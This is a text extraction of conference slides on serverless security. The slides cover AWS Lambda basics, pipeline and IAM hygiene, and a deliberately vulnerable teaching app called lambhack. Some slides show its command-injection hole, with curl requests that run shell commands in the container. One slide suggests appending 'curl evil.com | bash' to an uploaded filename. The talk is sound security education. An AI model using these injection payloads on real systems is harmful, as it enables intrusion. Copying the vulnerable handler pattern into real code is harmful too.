1. LASCON 2017 @WICKETT SERVERLESS SECURITY: A PRAGMATIC PRIMER
FOR BUILDERS AND DEFENDERS JAMES WICKETT
2. LASCON 2017 @WICKETT Dont worry, this is not a thinly veiled
vendor pitch.
3. LASCON 2017 @WICKETT WANT THE SLIDES RIGHT NOW? Send an
email to [email protected]
4. LASCON 2017 @WICKETT HEAD OF RESEARCH AT SIGNAL SCIENCES
DEVOPS DAYS AUSTIN ORGANIZER AUTHOR DEVOPS FUNDAMENTALS AT
LYNDA.COM BLOGGER AT THEAGILEADMIN.COM AND LABS.SIGNALSCIENCES.COM
JAMES WICKETT
5. LASCON 2017 @WICKETT SERVERLESS ENCOURAGES FUNCTIONS AS
DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING
END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
NEW SERVERLESS PATTERNS ARE JUST EMERGING SECURITY WITH SERVERLESS
IS EASIER SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF
2)
6. LASCON 2017 @WICKETT FOUR KEY AREAS APPLY TO SERVERLESS
SECURITY SOFTWARE SUPPLY CHAIN SECURITY DELIVERY PIPELINE SECURITY
DATA FLOW SECURITY ATTACK DETECTION LAMBHACK! A VERY VULNERABLE
LAMBDA STACK OPEN SOURCE PROJECT GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
7. LASCON 2017 @WICKETT WHAT IS SERVERLESS?
8. LASCON 2017 @WICKETT MISCONCEPTIONS
9. LASCON 2017 @WICKETT ITS MARKETING (CLOUD REBRANDED)
10. LASCON 2017 @WICKETT SERVERLESS == NO SERVERS
11. LASCON 2017 @WICKETT SERVERLESS == BACKEND AS A
SERVICE
12. LASCON 2017 @WICKETT SERVERLESS == PLATFORM AS A
SERVICE
17. LASCON 2017 @WICKETT 2012 - USED TO DESCRIBE BAAS AND
CONTINUOUS INTEGRATION SERVICES RUN BY THIRD PARTIES LATE 2014 -
AWS LAUNCHED LAMBDA JULY 2015 - AWS LAUNCHED API GATEWAY OCTOBER
2015 - AWS RE:INVENT - THE SERVERLESS COMPANY USING AWS LAMBDA 2015
TO PRESENT - FRAMEWORKS FORMING 2016 - GOOGLE CLOUD FUNCTIONS,
AZURE FUNCTIONS RELEASED 2016 - SERVERLESS CONFERENCES STARTED
HISTORY OF SERVERLESS
18. LASCON 2017 @WICKETT VMsHardware Serverless Inspiration
from @adrianco Waste Value
20. LASCON 2017 @WICKETT WHAT CAN WE SAY IS SERVERLESS?
21. LASCON 2017 @WICKETT SERVERLESS IS FUNCTIONS AS A SERVICE
(FaaS)
22. LASCON 2017 @WICKETT CONTAINERS ON DEMAND
23. LASCON 2017 @WICKETT SERVERLESS IS (NO MANAGEMENT OF)
SERVERS
24. LASCON 2017 @WICKETT SERVERLESS IS SERVICEFULL
25. LASCON 2017 @WICKETT SERVERLESS IS AN OPINIONATED FRAMEWORK
FOR COMPUTE AND CONTAINERS
26. LASCON 2017 @WICKETT If you want to lead your company
bravely into the new world, you would do well to focus lot on how
serverless will evolve. - @Cloudopinion https://medium.com/
@cloud_opinion/the-pattern- may-repeat-26de1e8b489d
27. LASCON 2017 @WICKETT THE CLOUD WAS TO VIRTUALIZATION AS
SERVERLESS WILL BE TO CONTAINERS
28. LASCON 2017 @WICKETT SERVERLESS WILL COMPLETELY DISRUPT THE
CONTAINER MARKET IN ONE, MAYBE TWO YEARS.
29. LASCON 2017 @WICKETT Serverless encourages functions as
deploy units, coupled with third party services that allow running
end-to-end applications without worrying about system operation.
SERVERLESS DEFINITION
30. LASCON 2017 @WICKETT SO, WHAT ARE THE UPSIDES?
31. LASCON 2017 @WICKETT SCALING BUILT IN
32. LASCON 2017 @WICKETT PAY FOR WHAT YOU USE IN 100MS
INCREMENTS
33. LASCON 2017 @WICKETT WITH SERVERLESS SYSTEM ADMINISTRATION
IS (MOSTLY) LOWER
34. LASCON 2017 @WICKETT SHORT CIRCUITS OPS AND MOVES
INFRASTRUCTURE RUNTIME CLOSER TO DEVS
35. LASCON 2017 @WICKETT YOU CAN SKIP DOCKERING ALL THE
THINGS!
36. LASCON 2017 @WICKETT GREAT, WHATS THE CATCH?
37. LASCON 2017 @WICKETT Ops burden to rationalize serverless
model @patrickdebois
45. LASCON 2017 @WICKETT APP NEEDS LARGE LOCAL DISK SPACE LONG
RUNNING JOBS BIG I/O TASKS LATENCY SENSITIVE REQUESTS THAT CANT
WAIT FOR THE COLD-STARTUP TIME SERVERLESS DEAL KILLERS
(MAYBE?)
48. LASCON 2017 @WICKETT
http://martinfowler.com/articles/serverless.html API GATEWAY
49. LASCON 2017 @WICKETT WEB APPLICATIONS
50. LASCON 2017 @WICKETT CI/CD auth wordpress scraper event
ingestion chatbots load testing MORE SERVERLESS USE CASES
51. LASCON 2017 @WICKETT Security
52. LASCON 2017 @WICKETT LETS TRY A SAMPLE APPLICATION IN
AWS
53. LASCON 2017 @WICKETT SERVERLESS APEX GO SPARTA KAPPA STEP
1: PICK A FRAMEWORK
54. LASCON 2017 @WICKETT
55. LASCON 2017 @WICKETT GOLANG! AWS LAMBDA SUPPORTS BRING YOUR
OWN BINARY SPARTA WRAPS YOUR COMPILED BINARY WITH A NODE.JS SHIM GO
SPARTA ALSO HANDLES ALL THE OTHER AWS SERVICES YOUR APP CONSUMES GO
SPARTA
56. LASCON 2017 @WICKETT CLOUDWATCH EVENTS AND LOGS DYNAMODB,
KINESIS, S3 SES, SNS API GATEWAY CREATION GO SPARTA INCLUDES
57. LASCON 2017 @WICKETT BUILD A WORD CLOUD GENERATOR ABLE TO
CONSUME 3RD PARTY APIS FOR TEXT SOURCES RETURN JSON WITH COUNTS OF
WORDS IN TEXT KEEP IT SIMPLE STEP 2: IDEA!
58. LASCON 2017 @WICKETT (USING GO SPARTA FOR THE FRAMEWORK)
LAMBDA S3 API GATEWAY STEP 3: DESIGN AND ARCHITECTURE
59. LASCON 2017 @WICKETT
60. LASCON 2017 @WICKETT STEP 4: WRITE THE HANDLER
61. LASCON 2017 @WICKETT STEP 5: SETUP API GATEWAY
62. LASCON 2017 @WICKETT STEP 6: SET THE CONFIG DETAILS
63. LASCON 2017 @WICKETT STEP 7: PROVISION YOUR APP!
64. LASCON 2017 @WICKETT STEP 8: SETUP STRICT IAM POLICIES
65. LASCON 2017 @WICKETT STEP 9: GIVE UP AND SET VERY BAD IAM
POLICIES PROMISE TO FIX LATER
66. LASCON 2017 @WICKETT STEP 10: PROVISION YOUR APP!
67. LASCON 2017 @WICKETT APP IN AWS CONSOLE
68. LASCON 2017 @WICKETT TEST LAMBDA EXEC IN CONSOLE FIRST RUN
OF 343MS
69. LASCON 2017 @WICKETT SECOND RUN ONLY TOOK 84MS
70. LASCON 2017 @WICKETT API GATEWAY IN CONSOLE
71. LASCON 2017 @WICKETT API GATEWAY EXECUTION IN CONSOLE
72. LASCON 2017 @WICKETT RETURNED JSON
73. LASCON 2017 @WICKETT MONITORING LAMBDA IN CONSOLE
74. LASCON 2017 @WICKETT YOU NEED A FRAMEWORK OR YOU DIE. WHY
IS IAM SO HAAARRDD? WOW! I HAVE A FULLY ELASTIC, FAST API RUNNING
ON THE INTERNET FOR BASICALLY NO COST. THIS IS GOING TO BE HUGE!
OVERALL SERVERLESS EXPERIENCE
75. LASCON 2017 @WICKETT IS SECURITY READY FOR SERVERLESS?
76. LASCON 2017 @WICKETT
77. LASCON 2017 @WICKETT SECURITY
78. LASCON 2017 @WICKETT many security teams work with a
worldview where their goal is to inhibit change as much as
possible
79. LASCON 2017 @WICKETT OLD PATH VS. NEW PATH Embrace Secrecy
Create Feedback Loops Just Pass Audit! Compliance adds Value
Enforce Stability Create Chaos Build a Wall Zero Trust Networks
Slow Validation Fast and Non-blocking Certainty Testing Adversity
Testing Test when Done Shift Left Process Driven The Paved
Road
80. LASCON 2017 @WICKETT
81. LASCON 2017 @WICKETT SECURE SOFTWARE SUPPLY CHAIN DELIVERY
PIPELINE DATA FLOW SECURITY ATTACK DETECTION FOUR AREAS OF
SERVERLESS SECURITY
82. LASCON 2017 @WICKETT source: @devsecops
83. LASCON 2017 @WICKETT THE CODE YOU WRITE (AND LIBS) IS YOUR
SURFACE AREA NOW CHANGE FROM THE PAST (E.G. SHELLSHOCK, HEARTBLEED)
OF THE NUMEROUS FIREDRILLS OUR INDUSTRY HAD TO ENDURE DUE TO
INHERITANCE SURFACE AREA REDUCTION
84. LASCON 2017 @WICKETT TLS CONTROL TO THE PROVIDER ROUTING
CONTROL TO THE PROVIDER CONSUMPTION OF THIRD PARTY SERVICES IAM
ROLES AND POLICY CONFUSION SURFACE AREA EXPANSION
85. LASCON 2017 @WICKETT SSL / TLS FROM THE PROVIDER
86. LASCON 2017 @WICKETT OLD WAY NEW WAY
87. LASCON 2017 @WICKETT ROUTING FROM THE PROVIDER
88. LASCON 2017 @WICKETT ROUTING THE OLD WAY
89. LASCON 2017 @WICKETT ROUTING THE NEW WAY
90. LASCON 2017 @WICKETT Lambda + s3 + kinesis + DynamoDB +
cloudformation + API Gateway + Auth0 SERVICE AND 3RD PARTY
EXPANSION
91. LASCON 2017 @WICKETT https://media.ccc.de/v/33c3-7865-
gone_in_60_milliseconds IAM ROLES AND POLICIES
92. LASCON 2017 @WICKETT Recommendation: Use a third-party
service to monitor for provider cong changes
93. LASCON 2017 @WICKETT DISABLE ROOT ACCESS KEYS MANAGE USERS
WITH PROFILES SECURE YOUR KEYS IN YOUR DEPLOY SYSTEM SECURE KEYS IN
DEV SYSTEM USE PROVIDER MFA USE GOOD HYGIENE WITH YOUR
PROVIDER
97. LASCON 2017 @WICKETT EASIER TO MOCK HARDER TO MOCK
98. LASCON 2017 @WICKETT UNIT TESTING EVEN MORE CRITICAL AS
INTEGRATION TESTING IN DEV IS HARDER
99. LASCON 2017 @WICKETT USE OF A STAGING OR PRE-PROD ENV END
TO END SYNTHETIC INTEGRATION TESTS ALL THE USUAL SUSPECTS
INTEGRATION TESTING
100. LASCON 2017 @WICKETT CONFIGURATION IS PART OF
DELIVERY
101. LASCON 2017 @WICKETT ONLY DEV KEYS CAN PUSH TO DEV ONLY
BUILD/DEPLOY SYSTEM CAN PUSH TO PRE- PROD INTEGRATION TESTS MUST
PASS IN THIS ENV SECURITY VALIDATION MUST TAKE PLACE BEFORE
PROMOTION ALLOW PUSH TO PROD, ONLY BY DEPLOY SYSTEM GOOD PIPELINE
PRACTICES
103. LASCON 2017 @WICKETT
http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015
GAUNTLT WORKSHOP IN 9 EXAMPLES
104. LASCON 2017 @WICKETT DATA FLOW DEVELOPMENT DATA FLOW
DIAGRAMS THREAT MODELING RUNTIME LOGGING CUSTOM MONITORS/
METRICS
105. LASCON 2017 @WICKETT Your provider is responsible for the
underlying infrastructure and services. You are responsible for
ensuring you use the services in a secure manner.
https://read.acloud.guru/adopting- serverless-architectures-and-
security-254a0c12b54a
106. LASCON 2017 @WICKETT SPOOFING CONSUMED RESOURCES DENIAL OF
SERVICE TIMEOUTS EXECUTION RESTRICTIONS FOR RESOURCES CAPACITY
ISSUES DATA FLOW SECURITY
107. LASCON 2017 @WICKETT ATTACK DETECTION
108. LASCON 2017 @WICKETT DOES APPLICATION SECURITY STILL
MATTER?
111. LASCON 2017 @WICKETT APPSEC GREATEST HITS (XSS, SQLI,
CMDEXE) STILL RELEVANT 15 YEARS LATER!
112. LASCON 2017 @WICKETT INSPIRED BY ALL THE GOATS
113. LASCON 2017 @WICKETT
114. LASCON 2017 @WICKETT SERVERLESS HAS A FALSE SENSE OF
SECURITY API PROXY LAYER THING PROTECTS ME, RIGHT? ;) WANTED TO SEE
MAKE THE POINT THAT APPSEC IS RELEVANT IN SERVERLESS A VULNERABLE
LAMBDA + API GATEWAY STACK BORN FROM THE HERITAGE OF WEBGOAT, RAILS
GOAT, GRUYERE, AND OTHERS INTRODUCING LAMBHACK
115. LASCON 2017 @WICKETT
116. LASCON 2017 @WICKETT A VULNERABLE LAMBDA + API GATEWAY
STACK OPEN SOURCE, MIT LICENSED INCLUDES ARBITRARY CODE EXECUTION
IN A QUERY STRING MORE WORK NEEDED, PULL REQUESTS ACCEPTED AND
LOOKING FOR COMMUNITY HELP GITHUB.COM/WICKETT/LAMBHACK
github.com/wickett/lamback
117. LASCON 2017 @WICKETT lambhack is a vulnerable serverless
lambda application It would certainly be a bad idea to base any
coding patterns o what you see here.
118. LASCON 2017 @WICKETT
119. LASCON 2017 @WICKETT WHY IS THIS BAD? command :=
lambdaEvent.QueryParams[args"] output := runner.Run(command)
120. LASCON 2017 @WICKETT With command execution available to
us in lambhack, we can poke around the container a bit
121. LASCON 2017 @WICKETT UNAME -A $ curl
https://XXXX.execute-api.us-
east-1.amazonaws.com/prod/lambhack/c?args=uname+-a; +sleep+1" >
Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6
20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
122. LASCON 2017 @WICKETT CAT /PROC/VERSION $ curl
https://XXXX.execute-api.us-
east-1.amazonaws.com/prod/lambhack/c?args=cat+/proc/
version;+sleep+1 > Linux version 4.4.35-33.55.amzn1.x86_64
(mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat
4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016
123. LASCON 2017 @WICKETT LETS LOOK IN /TMP $ curl
https://XXXX.execute-api.us-
east-1.amazonaws.com/prod/lambhack/c?args=ls+-la+/tmp; +sleep+1"
total 17916 drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 .
drwxr-xr-x 21 root root 4096 Feb 8 21:47 .. -rwxrwxr-x 1
sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64
126. LASCON 2017 @WICKETT GOT PROXY? $ curl
https://XXXX.execute-api.us- east-1.amazonaws.com/prod/lambhack/c?
args=curl+https://www.example.com; +sleep+1" > "nnn Example
Domainnn n n n n body {n background-color: #f0f0f2;n margin: 0;n
padding: 0;n font-family: "Open Sans", "Helvetica Neue", Helvetica,
Arial, sans-serif;n n }n div {n width: 600px;n margin: 5em auto;n
padding: 50px;n background-color: #fff;n border-radius: 1em;n }n
a:link, a:visited {n color: #38488f;n text-decoration: none;n }n
@media (max-width: 700px) {n body {n background-color: #fff;n }n
div {n width: auto;n margin: 0 auto;n border-radius: 0;n padding:
1em;n }n }n nnnn
n Example Domainn
This domain is established to be used for illustrative examples
in documents. You may use thisn domain in examples without prior
coordination or asking for permission.
n
More information...
n
nnn"
127. LASCON 2017 @WICKETT HELP NEEDED ADD XSS AND OTHER ATTACKS
ADD AUTH VECTORS AND EXAMPLES NEEDS A UI PLEASE! PULL REQUESTS
ACCEPTED :) FUTURE OF LAMBHACK
128. LASCON 2017 @WICKETT LAMBDA HAS LIMITED BLAST RADIUS, BUT
NOT ZERO MONITORING/LOGGING PLAYS A KEY ROLE HERE DETECT LONGER RUN
TIMES HIGHER ERROR RATE OCCURRENCES DATA INGESTION LOG ACTIONS OF
LAMBDAS APPSEC THOUGHTS
129. LASCON 2017 @WICKETT APPLICATION SECURITY IS STILL
RELEVANT
130. LASCON 2017 @WICKETT New surface area, similar appsec
problems Command Exec XSS Injection Attacks Try new things, e.g.
appending curl evil.com | bash or alert(1) to a lename you upload
on s3 TYPES OF ATTACKS
131. LASCON 2017 @WICKETT LOGGING, EMITTING EVENTS USAGE
METRICS VANDIUM (SQLI) WRAPPER CONTENT SECURITY POLICY (CSP) API
GATEWAYS ARE A GOOD PLACE TO ADD DEFENSE MORE THINGS NEED TO BE
DONE HERE DEFENSE
132. LASCON 2017 @WICKETT Development in serverless is easier
than ever, attracting new developers to web development, as a
result, application security will see a rise. FINAL THOUGHT
133. LASCON 2017 @WICKETT
134. LASCON 2017 @WICKETT SERVERLESS ENCOURAGES FUNCTIONS AS
DEPLOY UNITS, COUPLED WITH THIRD PARTY SERVICES THAT ALLOW RUNNING
END-TO-END APPLICATIONS WITHOUT WORRYING ABOUT SYSTEM OPERATION.
NEW SERVERLESS PATTERNS ARE JUST EMERGING SECURITY WITH SERVERLESS
IS EASIER SECURITY WITH SERVERLESS IS HARDER CONCLUSION (1 OF
2)
135. LASCON 2017 @WICKETT FOUR KEY AREAS APPLY TO SERVERLESS
SECURITY SOFTWARE SUPPLY CHAIN SECURITY DELIVERY PIPELINE SECURITY
DATA FLOW SECURITY ATTACK DETECTION LAMBHACK! A VERY VULNERABLE
LAMBDA STACK OPEN SOURCE PROJECT GITHUB.COM/WICKETT/LAMBHACK
CONCLUSION (2 OF 2)
136. LASCON 2017 @WICKETT WANT THE SLIDES RIGHT NOW OR HAVE
QUESTIONS? Send an email to [email protected]